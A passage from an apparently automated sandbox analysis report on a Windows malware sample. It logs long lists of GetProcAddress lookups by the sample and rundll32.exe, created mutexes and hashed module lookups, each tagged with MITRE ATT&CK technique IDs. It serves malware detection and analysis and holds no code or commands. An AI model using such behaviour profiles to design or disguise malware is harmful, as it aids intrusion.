parameter GetTickCount64 (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter Process32First (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter Process32Next (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter GetLayout (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter GdiRealizationInfo (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter FontIsLinked (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter GetTextFaceAliasW (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter GetFontAssocStatus (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter DwmIsCompositionEnabled (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter GdiIsMetaPrintDC (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter CoRegisterInitializeSpy (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter CoRevokeInitializeSpy (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00006120)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter IUnknown_QueryService (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WinHttpCreateProxyResolver (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter EventActivityIdControl (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSPStartup (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHOpenSocket (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHOpenSocket2 (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHJoinLeaf (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHNotify (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHGetSocketInformation (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHSetSocketInformation (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHGetSockaddrType (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHGetWildcardSockaddr (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHGetBroadcastSockaddr (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHAddressToString (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHStringToAddress (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHIoctl (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSAIoctl (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetBestInterfaceEx (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetIfEntry2 (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter NotifyIpInterfaceChange (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter NotifyUnicastIpAddressChange (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter SHGetValueA (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueW (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DnsGetProxyInformation (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter NdrClientCall2 (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RpcStringBindingComposeW (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RpcBindingFromStringBindingW (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RpcStringFreeW (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RpcBindingFree (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CLSIDFromOle1Class (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetCatalogObject (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter Dhcpv6QueryLeaseInfo (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter ConvertInterfaceNameToLuidW (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetCatalogObject2 (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DllGetClassObject (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DllCanUnloadNow (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoW (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter NSPStartup (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DnsQueryConfigAllocEx (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DnsNameCompare_W (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DnsApiAlloc (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DnsQueryExW (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadCompartmentId (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSAttemptAutodialAddr (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSAttemptAutodialName (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSNoteSuccessfulHostentLookup (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DnsApiFree (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter Dhcpv6FreeLeaseInfo (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DhcpIsEnabled (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DhcpQueryLeaseInfo (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DhcpFreeLeaseInfo (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter NdrOleInitializeExtension (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoGetClassObject (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoGetMarshalSizeMax (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoMarshalInterface (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoUnmarshalInterface (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter StringFromIID (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoGetPSClsid (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoReleaseMarshalData (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DcomChannelSetHResult (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalW (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidW (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DhcpRequestParams (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter ConvertInterfaceGuidToLuid (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoInternetCreateSecurityManager (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoInternetCreateZoneManager (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextW (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPAcquireContext (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPReleaseContext (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPGenKey (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPDeriveKey (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPDestroyKey (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPSetKeyParam (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPGetKeyParam (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPExportKey (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPImportKey (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPEncrypt (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPDecrypt (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPCreateHash (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPHashData (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPHashSessionKey (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPDestroyHash (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPSignHash (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPVerifySignature (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPGenRandom (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPGetUserKey (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPSetProvParam (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPGetProvParam (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPSetHashParam (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPGetHashParam (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPDuplicateKey (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPDuplicateHash (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoExW (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DnsFree (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter NamespaceCallout (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CryptGenRandom (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter I_RpcInitFwImports (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter I_RpcInitImports (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter I_RpcVerifierCorruptionExpected (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter I_RpcExtInitializeExtensionPoint (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter QueryActCtxW (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleExW (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CreateActCtxW (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter ActivateActCtx (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FindActCtxSectionStringW (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DeactivateActCtx (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter getaddrinfo (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter getnameinfo (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter freeaddrinfo (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSASocketA (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSASend (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSARecv (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyW (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetIpForwardTable2 (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetIpNetEntry2 (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FreeMibTable (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoSetProxyBlanket (UID: 00000000-00005596)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e0f6a@ADVAPI32.dll\"\n \"0e000f00703f0f6a@ADVAPI32.dll\"\n \"0e000f00cc3f0f6a@ADVAPI32.dll\"\n \"11001200b4470f6a@ADVAPI32.dll\"\n \"1100120048480f6a@ADVAPI32.dll\"\n \"120013008c480f6a@ADVAPI32.dll\"\n \"12001300e4480f6a@ADVAPI32.dll\"\n \"14001500386e0f6a@ADVAPI32.dll\"\n \"14001500506e0f6a@ADVAPI32.dll\"\n \"14001500686e0f6a@ADVAPI32.dll\"\n \"17001800806e0f6a@ADVAPI32.dll\"\n \"0d000e00986e0f6a@ADVAPI32.dll\"\n \"11001200a86e0f6a@ADVAPI32.dll\"\n \"11001200bc6e0f6a@ADVAPI32.dll\"\n \"0d000e0044660f6a@WININET.dll\"\n \"0d000e00b4660f6a@WININET.dll\"\n \"10001100ec660f6a@WININET.dll\"\n \"1000110090670f6a@WININET.dll\"\n \"10001100006f0f6a@WININET.dll\"\n \"10001100146f0f6a@WININET.dll\"\n \"14001500286f0f6a@WININET.dll\"\n \"14001500406f0f6a@WININET.dll\"\n \"12001300586f0f6a@WININET.dll\"\n \"120013006c6f0f6a@WININET.dll\"\n \"10001100d0670f6a@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 